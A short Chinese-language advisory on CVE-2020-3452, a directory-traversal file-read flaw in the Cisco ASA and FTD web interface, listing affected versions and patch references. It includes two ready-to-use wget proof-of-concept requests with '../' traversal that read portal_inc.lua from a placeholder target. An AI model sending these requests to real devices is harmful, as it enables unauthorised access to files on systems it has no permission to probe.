CVE-2020-3452 CISCO ASA远程任意文件读取漏洞
阅读原文时间:2021年12月27日阅读:2

0x01 漏洞描述

    Cisco官方 发布了 Cisco ASA 软件和 FTD 软件的 Web 接口存在目录遍历导致任意文件读取 的风险通告,该漏洞编号为 CVE-2020-3452。

    漏洞等级:中危

通过shadon引擎的搜索,目前全球大约有210,685个资产为

 该漏洞目前仅影响启用了AnyConnect或WebVPN配置的设备,并且此漏洞不能用于访问ASA或FTD系统文件或底层操作系统(OS)文件。

  • Cisco ASA:<= 9.6
  • Cisco ASA:9.7 , 9.8 , 9.9 , 9.10 , 9.12 , 9.13 , 9.14
  • Cisco FTD:6.2.2 , 6.2.3 , 6.3.0 , 6.4.0 , 6.5.0 , 6.6.0

        Cisco Adaptive Security Appliance (ASA) 和 Cisco Firepower Threat Defense (FTD) 的 web 服务接口存在漏洞,允许未经身份验证的远程攻击者向受影响的设备发送一个精心制作的HTTP请求,成功利用该漏洞的攻击者能够进行目录遍历攻击并读取目标系统上的敏感文件。

    漏洞主要是可以通过接口构造特定请求来实现攻击。

    漏洞的验证方式是可以读取相关的文件来验证,如:

   wget https://vpn.target.local:443/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../

   wget https://vpn.target.local:443/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua

    这里构造了数据包进行验证。

安装Cisco ASA/TFD 最新补丁,进行补丁升级。

具体可以参考:https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86

参考链接

https://twitter.com/aboul3la/status/1286809567989575685

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86

https://cert.360.cn/warning/detail?id=df808745e4d55c3847099a7048c8f86a